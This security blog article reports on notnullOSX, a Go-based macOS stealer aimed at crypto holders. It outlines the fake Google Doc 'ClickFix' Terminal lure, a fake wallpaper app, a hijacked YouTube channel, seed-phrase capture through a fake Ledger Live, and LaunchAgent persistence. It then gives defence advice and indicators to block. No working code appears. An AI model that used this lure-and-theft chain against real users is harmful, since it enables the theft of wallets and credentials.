Posted in

notnullOSX Malware: Fake Apps Steal Crypto on macOS

by Rakesh0

A dangerous new macOS cryptocurrency malware campaign has emerged in 2026, delivering a highly targeted stealer known as notnullOSX—built specifically to drain crypto wallets holding more than $10,000.

The malware abuses trusted platforms like fake wallpaper apps, Google Docs, and even a hijacked YouTube channel tied to Google services to trick Mac users into self-infecting their devices.

What makes this attack particularly alarming is not just the sophistication—but the psychological manipulation behind it.

In this article, you’ll learn:

  • How the notnullOSX malware attack works
  • Why macOS users are being specifically targeted
  • The infection chain from fake apps to full system compromise
  • Real-world impact on crypto wallets and credentials
  • How to defend against this evolving threat

What Is notnullOSX Malware?

notnullOSX is a Go-based macOS information stealer designed to:

  • Steal cryptocurrency wallet data
  • Harvest browser credentials
  • Extract messaging app data
  • Maintain persistent remote access

It is primarily aimed at macOS users holding significant crypto assets.

Primary Targets

  • Bitcoin Core wallets
  • Exodus and Electrum wallets
  • Ledger Live users
  • Telegram sessions
  • Browser-stored passwords and cookies

How the Attack Campaign Works

The campaign is not random—it is manually targeted and highly curated.

Target Selection Process

Attackers reportedly:

  • Identify victims with wallets exceeding $10,000
  • Collect social media profiles
  • Map wallet addresses and balances
  • Prioritize high-value individuals

Key Insight:
This is not mass malware—it is selective financial targeting.

Infection Chain Overview

The attack uses a multi-stage social engineering strategy:

1. Fake Google Document Trap

Victims receive a “protected document” showing:

  • Fake encryption error
  • False “Google API Connector” warning
  • Two “fix” options

Both options lead to malware installation.

2. ClickFix Terminal Attack

Users are tricked into running a Terminal command that:

  • Downloads a malicious script via curl
  • Installs a Mach-O binary
  • Disables Apple Gatekeeper protections
  • Registers persistence via LaunchAgent

Then users are asked to enable Full Disk Access.

Why This Is Critical

Granting Full Disk Access bypasses:

  • macOS Transparency, Consent, and Control (TCC) system
  • App-level permission prompts
  • Data protection controls

At that point, the malware can access:

  • Messages
  • Notes
  • Safari cookies
  • Keychains

3. Fake Wallpaper App (WallSpace)

A second infection path uses a fake app:

  • “WallSpace.app” wallpaper utility
  • Disguised macOS DMG file
  • Includes README + installer script

When executed, it installs the same malware payload.

YouTube as a Malware Delivery Weapon

Attackers also abused a compromised YouTube channel linked to YouTube.

What Made It Dangerous

  • Created in 2015 (aged, trusted account)
  • Suddenly gained 50,000+ views in days
  • Used to redirect users to malware sites

Security Signal:
A sudden spike in engagement on old accounts is often a sign of compromise.

What Happens After Infection

Once installed, notnullOSX operates silently in the background.

Data It Steals

  • iMessages and Notes
  • Safari cookies and sessions
  • Browser passwords
  • Telegram sessions
  • Crypto wallet data

Advanced Module: ReplaceApp

One of the most dangerous features is ReplaceApp, which:

  • Replaces Ledger Live with fake versions
  • Captures seed phrases during wallet setup
  • Operates without visible UI changes

Key Risk:
Hardware wallet users assume safety—but seed phrase interception breaks that trust model.

Persistence and Remote Control

The malware maintains:

  • Persistent LaunchAgent execution
  • Full disk monitoring access
  • Live command-and-control connection

This allows attackers to:

  • Push new commands
  • Update payloads
  • Steal additional data over time

Technical Breakdown of the Payload

  • Written in Go
  • Multi-architecture Mach-O binary (Intel + Apple Silicon)
  • ~27.74 MB in size
  • Low detection rate at discovery

At initial analysis:

  • Only ~10/64 antivirus engines detected it

Key Insight:
Signature-based detection alone is insufficient for modern macOS threats.

Common Attack Mistakes Users Fall For

1. Trusting Terminal Commands

Users often execute:

  • Base64-decoded commands
  • curl-based installers
  • “fix scripts” from documents

2. Granting Full Disk Access Blindly

Attackers exploit urgency and confusion to bypass macOS protections.

3. Fake App Installation Trust

DMG-based installers appear legitimate but hide malicious scripts.

Best Practices to Defend Against notnullOSX

1. Never Trust Terminal Commands from External Sources

Avoid commands from:

  • Websites
  • Documents
  • YouTube descriptions

2. Restrict Full Disk Access

Only grant to:

  • Verified applications
  • Known developers
  • Signed software

3. Monitor macOS Persistence Locations

Regularly inspect:

  • ~/Library/LaunchAgents/
  • /tmp/ directory
  • Unknown Mach-O binaries

4. Block Known Malicious Indicators

Security teams should monitor:

  • firebaseio.com C2 endpoints
  • cdn.filestackcontent.com downloads
  • Suspicious LaunchAgent creation

5. Enforce Crypto Security Hygiene

  • Use hardware wallets with verified software
  • Never install wallet tools from unofficial sources
  • Store seed phrases offline

Expert Insight: Why This Attack Is Dangerous

1. Social Engineering Over Exploits

No zero-day needed—just user trust manipulation.

2. macOS Is Becoming a Crypto Target

Historically “safer” perception is being exploited.

3. Security Tools Lag Behind

Low detection rates show:

  • Signature-based AV is insufficient
  • Behavioral detection is critical

Risk Impact Analysis

Severity: Critical

  • Direct financial theft potential
  • Full system compromise
  • Long-term persistence

Business Impact

  • Loss of crypto assets
  • Credential compromise
  • Enterprise macOS exposure

FAQs

1. What is notnullOSX malware?

It is a macOS crypto-stealing malware targeting users with significant digital asset holdings.

2. How does the malware spread?

Through fake wallpaper apps, phishing Google Docs, and hijacked YouTube channels.

3. What does it steal?

Crypto wallets, passwords, browser data, and messaging app sessions.

4. Why is Full Disk Access dangerous?

It bypasses macOS security prompts and allows unrestricted data access.

5. Can antivirus detect it?

Early versions had low detection rates across major antivirus engines.

6. Who is targeted?

Primarily macOS users with cryptocurrency holdings over $10,000.

Conclusion

The notnullOSX campaign shows how modern malware no longer relies on system exploits—it relies on human trust exploitation at scale.

Key Takeaways:

  • macOS users are high-value crypto targets
  • Fake apps and trusted platforms are being weaponized
  • Full Disk Access is a critical security boundary
  • Social engineering is now the primary attack vector

Final Thought:
In today’s threat landscape, the biggest vulnerability isn’t your system—it’s your trust.

Subscribe

Leave a Reply

Your email address will not be published. Required fields are marked *